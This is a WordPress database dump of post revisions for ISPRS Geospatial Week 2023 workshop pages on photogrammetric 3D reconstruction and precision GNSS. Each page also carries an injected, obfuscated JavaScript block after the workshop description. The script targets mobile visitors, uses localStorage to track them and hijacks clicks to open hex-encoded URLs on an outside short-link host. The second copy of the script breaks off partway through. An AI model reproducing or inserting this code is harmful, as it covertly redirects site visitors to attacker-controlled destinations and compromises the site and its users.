(3847,1,'2023-02-05 14:41:58','2023-02-05 14:41:58','[vc_row][vc_column][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)</strong></span></h5>\r\n&nbsp;\r\n<h5></h5>\r\n<h5 style=\"text-align: justify;\">This workshop focuses on algorithms and approaches for photogrammetric 3D reconstruction in the context of geospatial applications. The workshop addresses experts from photogrammetry, remote sensing, and computer vision fields in both academia and industry. Contributions are invited from all researchers and practitioners to cover the following core topics: models and methods for image orientation, multi-source data alignment and fusion, 3D data acquisition and surface reconstruction, image sequence analysis, multi-view geometry, and structure-from-motion (SfM) for data acquired from terrestrial, drone, airborne and spaceborne platforms, as well as the geo-applications of these methods.</h5>\r\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3465\" img_size=\"1200x1000\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h2 style=\"text-align: left;\"><strong>CHAIRS</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"63\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5></h5>\r\n<h5></h5>\r\n<h5><u>Themes of event:</u></h5>\r\n<ul>\r\n 	<li>\r\n<h6>Novel approaches to image orientation</h6>\r\n</li>\r\n 	<li>\r\n<h6>Orientation of unconventional images such as oblique images, images from cameras with rolling shutter, RGBD images, crowd-sourced images, historical images, and thermal infrared images</h6>\r\n</li>\r\n 	<li>\r\n<h6>Multimodal image matching for alignment, registration and fusion of multi-source imagery, e.g. optical and radar images</h6>\r\n</li>\r\n 	<li>\r\n<h6>Geometric, algebraic and learning-based approaches to multi-view stereo and structure-from-motion (SfM)</h6>\r\n</li>\r\n 	<li>\r\n<h6>Modern approaches in image orientation and bundle adjustment (BA), e.g. single-image calibration, online calibration, methods for handling ambiguous and degenerate configurations, large-scale BA, and structureless BA</h6>\r\n</li>\r\n 	<li>\r\n<h6>3D mapping and monitoring applications with focus on photogrammetric aspects, such as precision agriculture, forest inventory, structural health monitoring, traffic surveillance, disaster readiness and response, etc.</h6>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<h5><u>Scientific Committee:</u></h5>\r\n<ul>\r\n 	<li>\r\n<h6>Ronny Hänsch, Germany</h6>\r\n</li>\r\n 	<li>\r\n<h6>Mozhdeh Shahbazi, Canada</h6>\r\n</li>\r\n 	<li>\r\n<h6>Ewelina Rupnik, France</h6>\r\n</li>\r\n 	<li>\r\n<h6>Petra Helmholz, Australia</h6>\r\n</li>\r\n 	<li>\r\n<h6>Jianzhu Huai, China</h6>\r\n</li>\r\n 	<li>\r\n<h6>Michael Schmitt, Germany</h6>\r\n</li>\r\n 	<li>\r\n<h6>Dimitri Bulatov, Germany</h6>\r\n</li>\r\n 	<li>\r\n<h6>Saeid Homayouni, Canada</h6>\r\n</li>\r\n 	<li>\r\n<h6>David Belton, Australia</h6>\r\n</li>\r\n 	<li>\r\n<h6>Ahmed Shaker, Canada</h6>\r\n</li>\r\n 	<li>\r\n<h6>Gunho Sohn, Canada</h6>\r\n</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)','','inherit','closed','closed','','3449-revision-v1','','','2023-02-05 14:41:58','2023-02-05 14:41:58','',3449,'https://gsw2023.com/?p=3847',0,'revision','',0),
(3848,1,'2023-02-05 14:42:20','2023-02-05 14:42:20','[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3480\" img_size=\"600x600\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Precision GNSS: Technology Advances and Applications for Navigation and Mapping</span></strong></h5>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5 style=\"text-align: justify;\">The Global Navigation Satellite Systems (GNSS) have become an indispensable component for a wide range of applications. With rapid advances in GNSS system development which currently includes four operational systems and various regional augmentation systems, high accuracy is increasingly demanded by many emerging applications. For examples, within-lane autonomous vehicle control requires dm or better positioning accuracy while dm accuracy is also demanded for smartphone-based navigation and mapping. Although high accuracy has been widely demonstrated, the use of low-cost GNSS receivers in mass-market applications present various challenges in order to achieve high accuracy with stringent requirements on system availability and integrity. This workshop will seek contributions that are addressing the related challenges. They can be research progress on the development of new concept, models, algorithms and systems for precise GNSS positioning (PPP, PPP-RTK, LEO etc) and integrated navigation systems (GNSS, INS, Vision etc), as well as novel applications to navigation and mapping including application system design, implementation, prototype, product and testing results.</h5>\r\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"default_button\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"64\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h5 style=\"color: cyan;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6>Mathematical models and algorithms for precision GNSS</h6>\r\n</li>\r\n 	<li>\r\n<h6>Precise GNSS positioning algorithms (PPP, RTK, PPP-RTK etc)</h6>\r\n</li>\r\n 	<li>\r\n<h6>GNSS integrity monitoring and quality control algorithms</h6>\r\n</li>\r\n 	<li>\r\n<h6>GNSS augmentation algorithms and systems</h6>\r\n</li>\r\n 	<li>\r\n<h6>LEO-based satellite navigation and augmentation systems</h6>\r\n</li>\r\n 	<li>\r\n<h6>Atmospheric augmentation corrections for precision GNSS</h6>\r\n</li>\r\n 	<li>\r\n<h6>Precision GNSS with smartphones</h6>\r\n</li>\r\n 	<li>\r\n<h6>Precision GNSS with low-cost receivers</h6>\r\n</li>\r\n 	<li>\r\n<h6>Multi-sensor integrated systems (GNSS, INS, Vision etc)</h6>\r\n</li>\r\n 	<li>\r\n<h6>Precise positioning technologies in GNSS challenged environments</h6>\r\n</li>\r\n 	<li>\r\n<h6>Alternative technologies in GNSS denied environments</h6>\r\n</li>\r\n 	<li>\r\n<h6>Advanced software and hardware precision GNSS receivers</h6>\r\n</li>\r\n 	<li>\r\n<h6>Trends of future precision GNSS technology, systems and services</h6>\r\n</li>\r\n 	<li>\r\n<h6>Applications to navigation and mapping</h6>\r\n</li>\r\n</ul>\r\n<h6></h6>\r\n&nbsp;\r\n<h5 style=\"color: cyan;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6>Yang Gao, University of Calgary, Canada</h6>\r\n</li>\r\n 	<li>\r\n<h6>Xiaohong Zhang, Wuhan University, China</h6>\r\n</li>\r\n 	<li>\r\n<h6>Ahmed El-Mowafy, Curtin University, Australia</h6>\r\n</li>\r\n 	<li>\r\n<h6>OlaØvstedal, Norwegian University of Life Sciences, Norway</h6>\r\n</li>\r\n 	<li>\r\n<h6>Jacek Paziewski, University of Warmia and Mazury in Olsztyn, Poland</h6>\r\n</li>\r\n 	<li>\r\n<h6>Augusto Mazzoni, Sapienza University of Rome, Italy</h6>\r\n</li>\r\n 	<li>\r\n<h6>Washington Ochieng, Imperial College of London, UK</h6>\r\n</li>\r\n 	<li>\r\n<h6>Nobuaki Kubo, Tokyo University of Marine Science and Technology, Japan</h6>\r\n</li>\r\n 	<li>\r\n<h6>Jinling Wang, University of New South Wales, Australia</h6>\r\n</li>\r\n 	<li>\r\n<h6>Charles Toth, Ohio State University, USA</h6>\r\n</li>\r\n 	<li>\r\n<h6>Byungwoon Park, Sejong University, South Korea</h6>\r\n</li>\r\n 	<li>\r\n<h6>Maorong Ge, German Research Centre for Geosciences (GFZ), Germany</h6>\r\n</li>\r\n 	<li>\r\n<h6>Michael Fu, Google, USA</h6>\r\n</li>\r\n 	<li>\r\n<h6>Chris Rizos, University of New South Wales, Australia</h6>\r\n</li>\r\n 	<li>\r\n<h6>Sunil Bisnath, York University, Canada</h6>\r\n</li>\r\n 	<li>\r\n<h6>Galera Monico, São Paulo State University, Brazil</h6>\r\n</li>\r\n 	<li>\r\n<h6>Paul Groves, University College of London, UK</h6>\r\n</li>\r\n 	<li>\r\n<h6>George Liu, Hong Kong Polytechnic University, Hong Kong</h6>\r\n</li>\r\n 	<li>\r\n<h6>Guanwen Huang, Chang’An University, China</h6>\r\n</li>\r\n 	<li>\r\n<h6>Hongzhou Yang, University of Calgary, Canada</h6>\r\n</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3486\" img_size=\"600x600\"][vc_single_image image=\"3494\" img_size=\"600x600\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 